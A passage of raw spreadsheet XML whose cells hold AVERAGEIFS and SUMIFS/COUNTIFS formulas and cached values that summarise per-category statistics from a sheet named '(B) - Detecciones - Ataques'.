        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>2</v>
      </c>
      <c r="CG143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>7</v>
      </c>
      <c r="CI143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>22</v>
      </c>
      <c r="CJ143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>6</v>
      </c>
      <c r="CL143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>7.125</v>
      </c>
      <c r="CN143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>1.75</v>
      </c>
      <c r="CP143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>10</v>
      </c>
      <c r="CQ143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>2</v>
      </c>
      <c r="CR143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.4089039961</v>
      </c>
      <c r="CT143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.003992015968</v>
      </c>
      <c r="CU143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>6</v>
      </c>
      <c r="CW143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>2</v>
      </c>
      <c r="CY143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="CZ143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH143" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>1.951111111</v>
      </c>
      <c r="DI143" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ143" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GI$3:$GI$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>1.363636364</v>
      </c>
      <c r="DK143" s="271"/>
    </row>
    <row r="144">
      <c r="J144" s="277"/>
      <c r="K144" s="512"/>
      <c r="L144" s="512"/>
      <c r="M144" s="512"/>
      <c r="N144" s="512"/>
      <c r="O144" s="278"/>
      <c r="Q144" s="271"/>
      <c r="R144" s="352" t="s">
        <v>2564</v>
      </c>
      <c r="S144" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.04201427208</v>
      </c>
      <c r="T144" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.000001424625217</v>
      </c>
      <c r="U144" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.7359649123</v>
      </c>
      <c r="V144" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.125</v>
      </c>
      <c r="W144" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X144" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.1428571429</v>
      </c>
      <c r="Y144" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>79.2</v>
      </c>
      <c r="Z144" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>324.1959375</v>
      </c>
      <c r="AA144" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.1697154472</v>
      </c>
      <c r="AB144" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>1.5625</v>
      </c>
      <c r="AC144" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>2.4</v>
      </c>
      <c r="AD144" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.0008366984865</v>
      </c>
      <c r="AE144" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>7.4</v>
      </c>
      <c r="AF144" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BO$3:$BO$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.03272727273</v>
      </c>
      <c r="AG144" s="271"/>
      <c r="AH144" s="352" t="s">
        <v>2564</v>
      </c>
      <c r="AI144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.0006952108216</v>
      </c>
      <c r="AJ144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AL144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.000001424625217</v>
      </c>
      <c r="AN144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.005263157895</v>
      </c>
      <c r="AR144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AS144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>3</v>
      </c>
      <c r="AU144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>2</v>
      </c>
      <c r="AV144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1</v>
      </c>
      <c r="AW144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AY144" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0</v>
      </c>
      <c r="BA144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB144" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.3333333333</v>
      </c>
      <c r="BD144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>396</v>
      </c>
      <c r="BI144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>0</v>
      </c>
      <c r="BM144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>4.759348739</v>
      </c>
      <c r="BN144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>764.0161657</v>
      </c>
      <c r="BO144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>0</v>
      </c>
      <c r="BT144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.0625</v>
      </c>
      <c r="BZ144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0.08130081301</v>
      </c>
      <c r="CA144" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC144" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>0</v>
      </c>
      <c r="CG144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>8</v>
      </c>
      <c r="CL144" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>1.5</v>
      </c>
      <c r="CN144" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BO$3:$BO$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO144" s="518">
